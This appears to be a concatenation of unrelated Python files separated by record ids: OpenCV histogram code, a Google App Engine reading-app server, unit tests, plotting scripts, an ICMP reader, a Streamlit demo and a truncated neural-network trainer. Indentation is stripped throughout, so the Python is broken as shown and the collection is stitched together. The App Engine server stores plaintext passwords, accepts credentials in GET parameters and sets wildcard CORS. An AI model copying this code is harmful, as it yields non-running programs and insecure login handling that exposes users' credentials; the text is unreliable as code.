img = cv2.imread('Figures/PizzaOnConveyor.jpg')
img_ref = img.copy()
# "selectROI" : used to select a single RegionOfInterest bounding box.
roiTop, roiLeft, roiWidth, roiHeight = cv2.selectROI(img)
print(roiTop, roiLeft, roiWidth, roiHeight)
roi = img[roiLeft:roiLeft+roiHeight, roiTop:roiTop+roiWidth]
cv2.rectangle(img_ref, (roiTop,roiLeft), (roiTop+roiWidth,roiLeft+roiHeight), (0,0,255), 2)
# Step 2
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
# 1D histogram for img HSV
histH_img = cv2.calcHist([img_hsv], [0], None, [180], [0,180])
histS_img = cv2.calcHist([img_hsv], [1], None, [256], [0,255])
histV_img = cv2.calcHist([img_hsv], [2], None, [256], [0,255])
# 2D histogram for img HSV
hist2D_img = cv2.calcHist([img_hsv], [0,2], None, [180,256], [0,180,0,255])
cv2.normalize(hist2D_img, hist2D_img, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX);
roi_hsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
# 1D histogram for ROI HSV
histH_roi = cv2.calcHist([roi_hsv], [0], None, [180], [0,180])
histS_roi = cv2.calcHist([roi_hsv], [1], None, [256], [0,255])
histV_roi = cv2.calcHist([roi_hsv], [2], None, [256], [0,255])
# 2D histogram for ROI HSV
hist2D_roi = cv2.calcHist([roi_hsv], [0,2], None, [180,256], [0,180,0,255])
cv2.normalize(hist2D_roi, hist2D_roi, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX);
# Plot and visualized Histogram for selecting 2 channels
plt.subplot(241)
plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
plt.title("Original")
plt.subplot(242)
plt.plot(histH_img)
plt.title("img: Hue Histogram")
plt.subplot(243)
plt.plot(histS_img)
plt.title("img: Sat Histogram")
plt.subplot(244)
plt.plot(histV_img)
plt.title("img: Val Histogram")
plt.subplot(245)
plt.imshow(cv2.cvtColor(roi, cv2.COLOR_BGR2RGB))
plt.title("ROI")
plt.subplot(246)
plt.plot(histH_roi)
plt.title("ROI: Hue Histogram")
plt.subplot(247)
plt.plot(histS_roi)
plt.title("ROI: Sat Histogram")
plt.subplot(248)
plt.plot(histV_roi)
plt.title("ROI: Val Histogram")
plt.show()
# Plot 2D histogram from chosen channels (H&V)
plt.subplot(221)
plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
plt.title("Original")
plt.subplot(222)
plt.imshow(cv2.cvtColor(hist2D_img, cv2.COLOR_BGR2RGB))
plt.title("Original Image: 2D Histogram")
plt.xlabel('Value')
plt.ylabel('Hue')
plt.subplot(223)
plt.imshow(cv2.cvtColor(roi, cv2.COLOR_BGR2RGB))
plt.title("ROI")
plt.subplot(224)
plt.imshow(cv2.cvtColor(hist2D_roi, cv2.COLOR_BGR2RGB))
plt.title("ROI: 2D Histogram")
plt.xlabel('Value')
plt.ylabel('Hue')
plt.show()
# Step 3
# Compute BackProject image
backproj = cv2.calcBackProject([img_hsv], [0,2], hist2D_roi, [0,180,0,255], scale=2)
# Plot back projection
plt.subplot(121)
plt.imshow(cv2.cvtColor(img_ref, cv2.COLOR_BGR2RGB))
plt.title("Original Image w/ ROI")
plt.subplot(122)
plt.imshow(cv2.cvtColor(backproj, cv2.COLOR_BGR2RGB))
plt.title("Back Projection")
plt.show()
|
997,735 | 7e55aca5ec79f7069f3a457ebc19b871f040bb20 | #Author: Connor P. Bain
#Code for CockyReaders server-side
#Last modified December 3, 2014
import logging
import webapp2
import jinja2
import os
import json
from google.appengine.api import users
from google.appengine.ext import db
from __builtin__ import int
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__) + "/templates"))
#Host = "http://localhost:9080/"
Host = "http://www.cockyreaders-test.appspot.com/"
class MainPage(webapp2.RequestHandler):
def setupUser(self):
self.template_values = {}
self.currentUser = users.get_current_user()
self.template_values['user'] = self.currentUser
if self.currentUser:
self.template_values['login'] = users.create_logout_url("/")
else:
self.template_values['login'] = users.create_login_url(self.request.uri)
def setupJSON(self, objID):
self.json = False
if (self.request.get('fmt') == 'json'):
self.json = True
if ('json' in self.request.path.split('.')):
objID = objID.split('.')[0]
self.json = True
return objID
def render(self, loadTemplate):
template = jinja_environment.get_template(loadTemplate)
self.response.out.write(template.render(self.template_values))
def get(self):
self.setupUser();
#Remove this code after dataStore Objects are created
query = Book.all();
#DEMO CODE
if query.count() == 0:
newBook = Book(title = "Sleeping Beauty", genre = "Fantasy", isbn = int(1113), cover = "img/book_1.jpg", link = Host+"library/1113/")
newBook.put()
newBook = Book(title = "Moby Dick", genre = "Fantasy", isbn = int(1114), cover = "img/book_2.jpg", link = Host+"library/1114/")
newBook.put()
newBook = Book(title = "Where The Wild Things Are", genre = "Fantasy", isbn = int(1115), cover= "img/book_3.jpg" , link = Host+"library/1115/")
newBook.put()
self.template_values['title'] = "Administrator View"
self.render("main.html")
def getStudent(self, studentID):
key = db.Key.from_path('Student', long(studentID))
theStudent = db.get(key)
if theStudent == None:
self.redirect('/')
return None
return theStudent
#class for login side of the app
class LoginHandler(MainPage):
def get(self, stuff):
loginUser = self.request.get('user')
loginPassword = self.request.get('password')
#demo user
query = Student.all()
if query.count() == 0:
newStudent = Student(firstName="temp", lastName="temp", user="theFirst", password="password", bookList=[1113,1114])
newStudent.put()
#this does now work properly unless the key_name of each entry is that of the UserName
#currently the key_name is the student id
#key = db.Key.from_path('Student', loginUser )
#theStudent = db.get(key)
q = db.GqlQuery("SELECT * FROM Student WHERE user = :1 AND password = :2", loginUser, loginPassword)
logging.info(q.count())
self.response.headers.add_header('Access-Control-Allow-Origin', '*')
if q.count() == 0:
self.response.out.write("Failure")
self.error(500)
else:
logging.info("Login successful")
currentUser = q.get()
self.response.out.headers['Content-Type'] = "text/json"
self.response.out.write(json.dumps(currentUser.user))
def post(self, stuff):
newUserName = self.request.get('user')
newUserPassword = self.request.get('password')
newUserFirstName = self.request.get('firstName')
newUserlastName = self.request.get('lastName')
newUserTeacher = self.request.get('teacher')
newUserGrade = self.request.get('grade')
newUserPin = self.request.get('pinNumber')
q = db.GqlQuery("SELECT * FROM Student " + "WHERE user = :1", newUserName)
if q.count() >= 1:
#return error that this invalid
self.response.out.write("Failure")
logging.debug("invalid user being added")
else:
#if error here, remove the int cast and just let the userpin be a string
newUser = Student(user = newUserName,
firstName = newUserFirstName,
lastName = newUserlastName,
password = newUserPassword,
teacher = newUserTeacher,
grade = int(newUserGrade),
bookList = [1113, 1114, 1115, 1116 , 1117, 1119, 1120, 1121, 1123])
newUser.put()
newStat = Stat(parent = newUser, isbn = 1113, owner = newUserName, pagesRead = 0, bookmark = 1)
newStat.put()
newStat = Stat(parent = newUser, isbn = 1114, owner = newUserName, pagesRead = 0, bookmark = 1)
newStat.put()
self.response.out.headers['Content-Type'] = "text"
self.response.headers.add_header('Access-Control-Allow-Origin', '*')
self.response.out.write("Success")
#class for handling the sending of book info to app
class BookHandler(MainPage):
def get(self, bookID):
self.setupUser()
self.setupJSON(bookID)
loginUser = self.request.get('user')
logging.debug("value of my var is %s", str(loginUser))
query = Student.all()
if (query.count() == 0):
newStudent = Student(firstName="temp", lastName="temp", userName="theFirst", password="password", books= [1113,1114])
newStudent.put()
q = db.GqlQuery("SELECT * FROM Student " + "WHERE user = :1",loginUser)
theStudent = Student()
for p in q.run(limit=1):
theStudent = p
if theStudent == None:
libaryList = [1113,1114,1115]
else:
libaryList = theStudent.bookList
query = Book.all();
#DEMO CODE
if query.count() == 0:
newBook = Book(title = "Sleeping Beauty", genre = "Fantasy", isbn = int(1113), cover = "img/book_1.jpg", link = Host+"library/1113/")
newBook.put()
newBook = Book(title = "Moby Dick", genre = "Fantasy", isbn = int(1114), cover = "img/book_2.jpg", link = Host+"library/1114/")
newBook.put()
newBook = Book(title = "Where The Wild Things Are", genre = "Fantasy", isbn = int(1115), cover= "img/book_3.jpg" , link = Host+"library/1115/")
newBook.put()
query = Book.all()
if self.json:
self.response.headers.add_header('Access-Control-Allow-Origin', '*')
self.response.out.headers['Content-Type'] = "text/json"
books = []
#look through the books based on the isbn number
for isbnN in libaryList:
q = db.GqlQuery("SELECT * FROM Book " + "WHERE isbn = :1",int(isbnN))
for book in q.run(limit=1):
books.append(book.dict())
self.response.out.write(json.dumps(books))
return
#app side update of stats for users
class UpdateStats(MainPage):
def get(self, stuff):
#mostly place holder
inUser = self.request.get('user')
inISBN = self.request.get('isbn')
q = db.GqlQuery("SELECT * FROM Stat " + "WHERE owner = :1 AND isbn = :2", inUser, int(inISBN))
returnRecord = q.get()
if not returnRecord:
returnRecord = Stat(isbn = int(inISBN), owner = inUser, timeSpentReading = int(0), bookmark = int(1))
db.put(returnRecord)
self.response.headers.add_header('Access-Control-Allow-Origin', '*')
self.response.out.headers['Content-Type'] = "text/json"
logging.info(returnRecord)
self.response.out.write(json.dumps(returnRecord.dict()))
return
def post(self, stuff):
inUser = self.request.get('user')
inISBN = self.request.get('isbn')
inBookmark = self.request.get('bookmark')
inPagesRead = self.request.get('pagesRead')
q = db.GqlQuery("SELECT * FROM Stat " + "WHERE owner = :1 AND isbn = :2", inUser, int(inISBN))
for record in q.run(limit=1):
record.bookmark = int(inBookmark)
if(int(inPagesRead) > record.pagesRead):
record.pagesRead = int(inPagesRead)
db.put(record)
return
#admin Side stat catalogue
class StatQuery(MainPage):
def get(self,random):
self.setupUser()
self.template_values['title'] = 'Stats'
self.render('stats.html')
return
def post(self, somerandomfieldthatbreakeverythingifnothere):
self.setupUser()
Owner = self.request.get('user')
q = db.GqlQuery("SELECT * FROM Stat " + "WHERE owner = :1", Owner)
self.template_values['title'] = 'Stats'
self.template_values['stats']=q
self.render('stats.html')
return
#admin side user catalogue
class StudentHandler(MainPage):
def get(self, studentID):
self.setupUser()
query = Student.all()
logging.info(query.count())
self.template_values['students'] = query
self.template_values['title'] = 'Your Students'
self.render('studentlist.html')
return
def post(self, studentID):
self.setupUser()
fName = self.request.get('firstName')
lName = self.request.get('lastName')
UserName = self.request.get('user')
Password = self.request.get('password')
teacher = self.request.get('teacher')
grade = self.request.get('grade')
newStudent = Student(firstName = fName,
lastName = lName,
user = UserName,
password = Password,
teacher = teacher,
grade = int(grade),
bookList=[1113,1114],
)
newStudent.put()
newStat = Stat(parent = newStudent, isbn = 1113, owner = UserName, pagesRead = 0, bookmark = 1)
newStat.put()
newStat = Stat(parent = newStudent, isbn = 1114, owner = UserName, pagesRead = 0, bookmark = 1)
newStat.put()
self.redirect('/student')
return
#admin side user book catalogue
class AddBooks(MainPage):
def get(self, stuff):
self.setupUser()
self.template_values['title'] = 'Student Books'
self.template_values['Returnsuccess'] = ''
self.render('booklist.html')
return
def post(self, stuff):
self.setupUser()
UserName = self.request.get('user')
Isbn = self.request.get('isbn')
if (UserName != '' and Isbn != ''):
q = db.GqlQuery("SELECT * FROM Student " + "WHERE user = :1",UserName)
q2 = db.GqlQuery("SELECT * FROM Book " + "WHERE isbn = :1",int(Isbn))
if (q2.count() > 0 and q.count() > 0):
for userN in q.run(limit = 1):
userN.bookList.append(int(Isbn))
userN.put()
#self.redirect('/addBook')
self.template_values['Returnsuccess'] = "Success"
self.render('booklist.html')
else:
#self.redirect('/addBook')
self.template_values['Returnsuccess'] = "Failure"
self.render('booklist.html')
else:
self.template_values['Returnsuccess'] = "Failure"
self.render('booklist.html')
return
#admin side global book catalogue
class Libary(MainPage):
def get(self, stuff):
#returns all the books in the libary
self.setupUser()
q = Book.all()
books = []
#replace with template
self.template_values['title']='Library'
self.template_values['books'] = q
self.render('libarylist.html')
def post(self, stuff):
#note the book file should be transferred using standard ftp and then this record should be added
#do not post this first
Title = self.request.get('title')
Isbn = self.request.get('isbn')
Genre = self.request.get('genre')
Cover = self.request.get('cover')
Link = self.request.get('link')
newbook = Book(title = Title, genre = Genre, isbn = int(Isbn), cover = Cover, link = Host + Link)
newbook.put()
self.redirect('/libary')
return
#database side user model
class Student(db.Model):
user = db.StringProperty()
firstName = db.StringProperty()
lastName = db.StringProperty()
teacher = db.StringProperty()
grade = db.IntegerProperty()
wordsDefined = db.IntegerProperty()
timeReading = db.IntegerProperty()
password = db.StringProperty()
bookList = db.ListProperty(int)
def id(self):
return self.key().id()
def dict(self):
theStudentDict = {}
theStudentDict['id'] = self.id()
theStudentDict['firstName'] = self.firstName
theStudentDict['lastName'] = self.lastName
theStudentDict['teacher'] = self.teacher
theStudentDict['grade'] = self.grade
theStudentDict['isbnList'] = self.bookList
return theStudentDict
#database side book model
class Book(db.Model):
title = db.StringProperty()
genre = db.StringProperty()
isbn = db.IntegerProperty()
cover = db.StringProperty()
link = db.StringProperty()
def dict(self):
theBookDict = {}
theBookDict['title'] = self.title
theBookDict['genre'] = self.genre
theBookDict['isbn'] = self.isbn
theBookDict['cover'] = self.cover
theBookDict['link'] = self.link
return theBookDict
#database side statistic model
class Stat(db.Model):
isbn = db.IntegerProperty()
owner = db.StringProperty()
pagesRead = db.IntegerProperty()
timeSpentReading = db.IntegerProperty()
bookmark = db.IntegerProperty()
def dict(self):
stat = {}
stat['bookmark'] = self.bookmark
stat['pagesRead'] = self.pagesRead
return stat
#class Bookshelf(db.Model):# books = db.ListProperty(long)
# sort = db.IntegerProperty() # Sort by this variable
# positions = db.ListProperty(long)
app = webapp2.WSGIApplication([('/student()', StudentHandler), ('/student/(.*)', StudentHandler),
('/book()', BookHandler), ('/login()',LoginHandler), ('/stats()', UpdateStats),
('/addBook()',AddBooks), ('/addBook/(.*)',AddBooks),
('/libary()',Libary), ('/libary/(.*)', Libary),
('/stat()', StatQuery),('/stat/(.*)', StatQuery),
('/.*', MainPage)], debug=True) |
997,736 | 23e857de8ce487a096c673f99188a79123206a0e | import unittest
import numpy as np
from numcube import Index
class IndexTests(unittest.TestCase):
def test_create_index(self):
a = Index("A", [10, 20, 30])
self.assertEqual(a.name, "A")
self.assertEqual(len(a), 3)
a = Index("Dim", ["a", "b", "c", "d"])
self.assertEqual(a.name, "Dim")
self.assertEqual(len(a), 4)
# duplicate values
self.assertRaises(ValueError, Index, "A", ["a", "b", "a"])
self.assertRaises(ValueError, Index, "A", [0, 1, 1])
# invalid Index name
self.assertRaises(TypeError, Index, 1, [1, 2, 3])
def test_index_take(self):
a = Index("A", ["a", "b", "c", "d"])
self.assertEqual(a.take([0, 2]).name, "A") # keep name
self.assertTrue(np.array_equal(a.take([0, 2]).values, ["a", "c"]))
self.assertTrue(np.array_equal(a.take([2, 0]).values, ["c", "a"]))
self.assertRaises(ValueError, a.take, [0, 2, 0]) # duplicate values in Index
def test_compress(self):
a = Index("A", ["a", "b", "c", "d"])
selector = [True, False, True, False]
b = a.compress(selector)
c = a[np.array(selector)]
self.assertTrue(np.array_equal(b.values, c.values))
self.assertEqual(a.name, b.name) # keep name
self.assertTrue(np.array_equal(b.values, a.values.compress(selector)))
def test_writeable(self):
# once index has been created, its values cannot be changed in order not to break lookup function
a = Index("A", [10, 20, 30])
self.assertRaises(ValueError, a.values.__setitem__, 0, 40)
self.assertRaises(ValueError, a.values.sort)
def test_indexof(self):
a = Index("A", [10, 20, 30])
b = Index("Dim", ["ab", "bc", "cd", "de"])
# a single value
self.assertEqual(a.indexof(10), 0)
self.assertEqual(b.indexof("cd"), 2)
self.assertEqual(b.indexof(["cd"]), 2)
# multiple values
self.assertTrue(np.array_equal(a.indexof([10, 30]), [0, 2]))
self.assertTrue(np.array_equal(b.indexof(["de", "cd"]), [3, 2]))
# non-existent value raises KeyError (similar to dictionary lookup)
self.assertRaises(KeyError, a.indexof, 0)
self.assertRaises(KeyError, b.indexof, "ef")
self.assertRaises(KeyError, b.indexof, None)
self.assertRaises(KeyError, a.indexof, [0, 1])
self.assertRaises(KeyError, b.indexof, ["de", "ef"])
def test_operator_in(self):
a = Index("A", [10, 20, 30])
b = Index("B", ["ab", "bc", "cd", "de"])
self.assertTrue(20 in a)
self.assertFalse(40 in a)
self.assertTrue("bc" in b)
self.assertFalse("ef" in b)
# unlike Index.contains() operator 'in' cannot work with multiple values
#self.assertRaises(TypeError, a, __contains__, [0, 10])
#self.assertRaises(TypeError, a, __contains__, (0, 10))
def test_contains(self):
a = Index("A", [10, 20, 30])
b = Index("B", ["ab", "bc", "cd", "de"])
# a single value (in this case, operator 'in' is preferred)
self.assertTrue(a.contains(20))
self.assertFalse(a.contains(40))
self.assertTrue(b.contains("bc"))
self.assertFalse(b.contains("ef"))
# multiple values returns one-dimensional numpy array of logical values
self.assertTrue(np.array_equal(a.contains([0, 10, 20, 40]), [False, True, True, False]))
self.assertTrue(np.array_equal(b.contains(["ab"]), [True]))
self.assertTrue(np.array_equal(b.contains(["ab", "ef", "bc"]), [True, False, True]))
self.assertTrue(np.array_equal(b.contains(("ab", "ef", "bc")), [True, False, True]))
|
997,737 | d41c5f2102188d3bc7fcf1fc66da9cd089cbdb01 | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 5 11:32:38 2016
@author: maestre
"""
import matplotlib.pyplot as plt
import numpy as np
# fake up some data
#spread = np.random.rand(50) * 100
spread = np.random.randint(-15,15, 50)
#center = np.ones(1) * 50
center = np.zeros(50)
#flier_high = np.random.rand(10) * 100 + 100
flier_high = np.random.randint(5, 25, 10)
#flier_low = np.random.rand(10) * -100
flier_low = np.random.randint(-25, -5, 10)
data = np.concatenate((spread, center, flier_high, flier_low), 0)
# basic plot
#plt.boxplot(data)
## notched plot
#plt.figure()
#plt.boxplot(data, 1)
#
## change outlier point symbols
#plt.figure()
#plt.boxplot(data, 0, 'gD')
#
## don't show outlier points
#plt.figure()
#plt.boxplot(data, 0, '')
#
## horizontal boxes
#plt.figure()
#plt.boxplot(data, 0, 'rs', 0)
#
## change whisker length
#plt.figure()
#plt.boxplot(data, 0, 'rs', 0, 0.75)
#
# fake up some more data
spread = np.random.rand(50) * 100
center = np.ones(25) * 40
flier_high = np.random.rand(10) * 100 + 100
flier_low = np.random.rand(10) * -100
d2 = np.concatenate((spread, center, flier_high, flier_low), 0)
data.shape = (-1, 1)
d2.shape = (-1, 1)
# data = concatenate( (data, d2), 1 )
# Making a 2-D array only works if all the columns are the
# same length. If they are not, then use a list instead.
# This is actually more efficient because boxplot converts
# a 2-D array into a list of vectors internally anyway.
data = [data, d2]
# multiple box plots on one figure
plt.figure()
plt.boxplot(data)
plt.show() |
997,738 | 1610e1c5da800c784d8acac4fc363b1bc4b65bbc | from datetime import timedelta, datetime
import traceback
from csv_utils import read_csv
DATE_TIME_FORMAT = '%Y-%m-%d %H:%M:%S'
def write_to_file(file_name, data):
with open(file_name, 'w') as f:
f.write('\n'.join(data))
print("File generated")
def format_rain(csv_file, start):
timeseries = read_csv(csv_file)
rain_dat = []
total_rain = 0
cumulative_timeseries = []
for i in range(len(timeseries)):
total_rain += float(timeseries[i][1])
cumulative_timeseries.append(total_rain)
for i in range(len(timeseries)):
time_col = ((datetime.strptime(timeseries[i][0], DATE_TIME_FORMAT) - start).total_seconds())/3600
rain_col = float(timeseries[i][1])/total_rain
rain_dat.append("R {} {}".format('%.4f' % time_col, cumulative_timeseries[i]/total_rain))
rain_dat.insert(0, "R 0 0")
rain_dat.insert(0, "{} 5 0 0".format(total_rain))
rain_dat.insert(0, "0 0 ")
write_to_file("RAIN.DAT", rain_dat)
# format_rain("6531.csv", datetime.strptime("2019-06-12 23:30:00", DATE_TIME_FORMAT))
def generate_time_values(start, end):
start = datetime.strptime(start, DATE_TIME_FORMAT)
end = datetime.strptime(end, DATE_TIME_FORMAT)
times_original = [start]
time = start
while times_original[-1] < end:
time = time + timedelta(minutes=5)
times_original.append(time)
print(time)
times = []
for i in range(len(times_original)):
times.append("{}".format('%.4f' % ((times_original[i] - start).total_seconds() / 3600)))
print((times_original[i] - start).total_seconds() / 3600)
write_to_file("times.DAT", times)
# generate_time_values(start="2019-06-01 00:00:00", end="2019-06-20 00:00:00") |
997,739 | feeb1a2f4e4289dc1cb80779806fa7fffd1e9593 | import pytest
from ..__main__ import defaultdict
def test_case_1():
assert defaultdict(['a','a','b','a','b'],['a','b','c']) == [[1,2,4],[3,5],[-1]]
|
997,740 | 80610e200559754c9964fdbf41773840d3564207 | import socket, errno, struct, time
from twisted.internet import main, error
from twisted.python import log
class IcmpReader(object):
"""
This is a simple icmp reader class.
it reads all ICMP messages and does simple processing on them:
- rtt calculation
- sequence number check
"""
def __init__(self, socket, callback=None, hosts=[]):
self.socket = socket
self.callback = callback
self.hosts = hosts
from twisted.internet import reactor
reactor.addReader(self)
def fileno(self):
try:
return self.socket.fileno()
except socket.error:
return -1
def printStats(self):
for host_addr, host in self.hosts.iteritems():
print host
def connectionLost(self, reason):
self.socket.close()
from twisted.internet import reactor
reactor.removeReader(self)
self.printStats()
def processPacket(self, recv_packet, addr):
# skip first 20 bytes for IP header, and 4 bytes of:
# packet type, something else and the checksum
icmp_header = recv_packet[24:40]
packet_id, sequence, timestamp = struct.unpack(
#428
"Ihd", icmp_header
)
rtt = time.time() - timestamp
# extract the source of this echo packet
# and compare it with the id included in payload
(src_ip,) = struct.unpack("!I", recv_packet[12:16])
if packet_id != src_ip:
log.msg("ignoring received packet with an unknown ID {}, should be: {}".format(packet_id, src_ip))
return
try:
host = self.hosts[addr]
host.updateStats(rtt)
except KeyError:
log.msg("host {} not found in the hosts table".format(addr,))
return
# ignore if it's not an echo reply message
# if packet_type == 0:
# self.removeTimeout(addr, sequence)
if self.callback is None:
log.msg("got packet: ", packet_id, sequence, addr, "rtt:" ,rtt)
else:
self.callback(host, rtt)
def doRead(self):
while True:
try:
recv_packet, addr = self.socket.recvfrom(1024)
except socket.error, e:
if e.args[0] == errno.EWOULDBLOCK:
break
return main.CONNECTION_LOST
self.processPacket(recv_packet, addr[0])
def logPrefix(self):
return "IcmpReader"
|
997,741 | 13dda0f6c7282044139e083f013d9a9312a921e9 | # Core Pkgs
import streamlit as st
from memory_profiler import profile
@profile
def main():
st.title("Memeory Profiling Streamlit Apps")
menu = ["Home","Text Analysis","About"]
choice = st.sidebar.selectbox("Menu",menu)
if choice == "Home":
st.subheader("Home")
elif choice == "Text Analysis":
st.subheader("Text Analysis")
else:
st.subheader("About")
if __name__ == '__main__':
main()
# How to Run
# python3 -m memory_profiler app.py
# mprof run app.py
# mprof plot |
997,742 | ac1f10c2bc528b6a6eef66dd13550b2b219c7dea | """ h_letters = [letter for letter in 'human']
print(h_letters)
this_list = []
for x in 'human':
this_list.append(x)
print(this_list)
h_nums = [num*2 for num in range(1,11)]
print(h_nums)
number_list = [x for x in range(20) if x % 2 == 0]
print(number_list)
number_list_two = ['Even' if x % 2 == 0 else 'Odd' for x in range(10)]
print(number_list_two) """
test_list = [('gfg', 1, True),('is', False),('best', 2)]
print(f'The original list : {test_list}') |
997,743 | da211532a604c6b73f15759edc4fe8ba23e9caf1 | bicycles = ['trek', 'cannondale', 'redline', 'specialized']
print(bicycles)
print(bicycles[0])
message = "my first bicycle was a " + bicycles[0].title() + "."
print(message)
motorcycles = ["honda", 'yamaha', "suzuki"]
print(motorcycles)
motorcycles[0] = "ducati"
print(motorcycles)
motorcycles.append("ducati")
print(motorcycles)
motorcycles.clear()
print(motorcycles)
motorcycles.append("honda")
motorcycles.append("yamaha")
motorcycles.append("suzuki")
print(motorcycles)
motorcycles.insert(1, "ducati")
print(motorcycles)
del motorcycles[1]
print(motorcycles)
popped_motorcycle = motorcycles.pop()
print(popped_motorcycle)
print(motorcycles)
motorcycles = ["honda", 'yamaha', "suzuki"]
print(motorcycles)
popped_motorcycle = motorcycles.pop(2)
print(popped_motorcycle)
print(motorcycles)
motorcycles = ["honda", 'yamaha', "suzuki", "ducati"]
print(motorcycles)
motorcycles.remove("ducati")
print(motorcycles)
cars = ["bmw", "auid", "toyota", "subaru"]
print(cars)
cars.sort()
print(cars)
cars.sort(reverse=True)
print(cars)
cars = ["bmw", "auid", "toyota", "subaru"]
print(cars)
print(sorted(cars))
print(cars)
print(sorted(cars, reverse=True))
cars = ["bmw", "auid", "toyota", "subaru"]
print(cars)
cars.reverse()
print(cars)
print(len(cars)) |
997,744 | e81d080a47c45c6f897daabf6e88256f5e58d93d | import random
randomNumber = random.randint(0, 1000)
print(randomNumber)
|
997,745 | 9c959ec708e911a49892d9eef8ead745d289d6c2 | import numpy as np
import matplotlib.pyplot as plt
import test
import copy as cp
# Relu function
def rel(z):
return (abs(z) + z) / 2
# Show data classified result
def show_ans(x_s, y_s, m_s, subplt):
for k in range(0, m_s):
if y_s[0, k] == 1:
subplt.plot(x_s[0, k], x_s[1, k], 'ro')
else:
subplt.plot(x_s[0, k], x_s[1, k], 'go')
# y1 = -b_s / w_s[0, 1]
# y2 = -(100 * w_s[0, 0] + b_s) / w_s[0, 1]
# plt.plot([0, 100], [y1, y2])
# Show err's curve
def show_err(subplt, err_data):
subplt.cla()
subplt.plot(err_data[0], err_data[1])
# Show plane classified result
def show_class(W, b, n, g, max, min, subplt):
X_t = np.arange(min[0], max[0], max[0] / 16)
Y_t = np.arange(min[1], max[1], max[1] / 16)
X_temp = [[], []]
Z_t = []
A_t = []
for i in X_t:
for j in Y_t:
X_temp[0].append(i)
X_temp[1].append(j)
m_t = len(X_temp[0])
X_t = np.array(X_temp).reshape(2, m_t)
# forward
Z_t.clear()
A_t.clear()
for i in range(len(n)):
if i == 0:
Z_t.append(np.dot(W[i], np.array(X_t).reshape(2, m_t)) + b[i])
else:
Z_t.append(np.dot(W[i], A_t[i - 1]) + b[i])
if g[i] == 'RELU':
A_t.append(rel(Z_t[i]))
elif g[i] == 'sigmoid':
A_t.append(1.0 / (1.0 + np.exp(-Z_t[i])))
Y_tra_t = cp.deepcopy(A_t[len(n) - 1])
Y_tra_t[Y_tra_t >= 0.5] = 1
Y_tra_t[Y_tra_t < 0.5] = 0
show_ans(X_t, Y_tra_t, m_t, subplt)
fo = open("data1.txt")
x_temp = []
y_temp = []
for line in fo:
temp = line.split(',')
x_temp += [float(f) for f in temp[0:2]]
y_temp += [float(f) for f in temp[2][0]]
alpha = 3.5
# alpha = 5
beta = 0.9
X = np.array(x_temp).reshape(int(len(x_temp) / 2), 2).T
Y = np.array(y_temp).reshape(1, int(len(y_temp)))
# init par
v = len(X)
m = len(X[0])
n = [4, 4, 4,4,4, 1]
g = ["RELU", "RELU", "RELU","RELU","RELU", "sigmoid"]
W = []
b = []
gamma = []
Z = []
A = []
j = 1
epsilon = 0.00000000000001
loop = 10000
dJdZ = [0] * len(n)
dJdZ_cali = [0] * len(n)
dJdZ_norm = [0] * len(n)
dJdW = [0] * len(n)
dJdb = [0] * len(n)
VdJdW = [0] * len(n)
VdJdb = [0] * len(n)
SdJdW = [0] * len(n)
SdJdb = [0] * len(n)
err = [[], []]
fig1, ax1 = plt.subplots()
fig2, ax2 = plt.subplots()
fig3, ax3 = plt.subplots()
fig4, ax4 = plt.subplots()
for i in n:
if j == 1:
W.append(np.random.randn(i, v))
# W.append(np.ones(i * v).reshape(i, v))
j += 1
else:
W.append(np.random.randn(i, last_i))
# W.append(np.ones(i * last_i).reshape(i, last_i))
b.append(np.zeros(i).reshape(i, 1))
gamma.append(np.ones(i).reshape(i, 1))
last_i = i
# normalize sets
miu = np.mean(X, 1).reshape(v, 1)
X = X - miu
lambd = np.mean(np.square(X), 1).reshape(v, 1)
X = X / lambd
X = X / np.max(X[0, :])
X_max = [1, 1]
X_min = [-1, -1]
# X_max = [np.ceil(np.max(X[0, :])), np.ceil(np.max(X[1, :]))]
# X_min = [np.floor(np.min(X[0, :])), np.floor(np.min(X[1, :]))]
# loop
j = 0
for j in range(loop):
# while True:
# forward
Z.clear()
A.clear()
for i in range(len(n)):
if i == 0:
Z.append(np.dot(W[i], np.array(X).reshape(v, m)) + b[i])
else:
Z.append(np.dot(W[i], A[i - 1]) + b[i])
if g[i] == 'RELU':
A.append(rel(Z[i]))
elif g[i] == 'sigmoid':
A.append(1.0 / (1.0 + np.exp(-Z[i])))
Y_tra = cp.deepcopy(A[len(n) - 1])
Y_tra[Y_tra >= 0.5] = 1
Y_tra[Y_tra < 0.5] = 0
print("-------------------------")
J = -(np.dot(Y, np.log(A[len(n) - 1] + epsilon).T) + np.dot((1 - Y), np.log(1 - A[len(n) - 1] + epsilon).T)) / m
print(J[0][0])
if J[0][0] < 0.01:
break
err[0].append(j + 1)
err[1].append(J[0][0])
# backward
dJdZ[len(n) - 1] = (A[len(n) - 1] - Y) / m
for i in range(len(n)):
if len(n) - 1 - i == 0:
dJdW[len(n) - 1 - i] = np.dot(dJdZ[len(n) - 1 - i], X.T)
else:
dJdW[len(n) - 1 - i] = np.dot(dJdZ[len(n) - 1 - i], A[len(n) - 1 - i - 1].T)
dJdb[len(n) - 1 - i] = np.sum(dJdZ[len(n) - 1 - i], 1, None, None, True)
# print(dJdW[len(n) - 1 - i])
if i <= len(n) - 2:
temp_matrix = cp.deepcopy(Z[len(n) - 1 - i - 1])
if g[len(n) - 1 - i - 1] == 'RELU':
temp_matrix[temp_matrix <= 0] = 0
temp_matrix[temp_matrix > 0] = 1
elif g[len(n) - 1 - i - 1] == 'sigmoid':
temp_matrix_s = np.exp(-temp_matrix) / np.square(1 + np.exp(-temp_matrix))
temp_matrix = temp_matrix_s
dJdZ[len(n) - 1 - i - 1] = np.dot(W[len(n) - 1 - i].T, dJdZ[len(n) - 1 - i]) * temp_matrix
# Update parameter
for ini_i in range(len(n)):
# RMSprop gradient descent
# SdJdW[len(n) - 1 - ini_i] = beta * SdJdW[len(n) - 1 - ini_i] + (1 - beta) * np.square(dJdW[len(n) - 1 - ini_i])
# SdJdb[len(n) - 1 - ini_i] = beta * SdJdb[len(n) - 1 - ini_i] + (1 - beta) * np.square(dJdb[len(n) - 1 - ini_i])
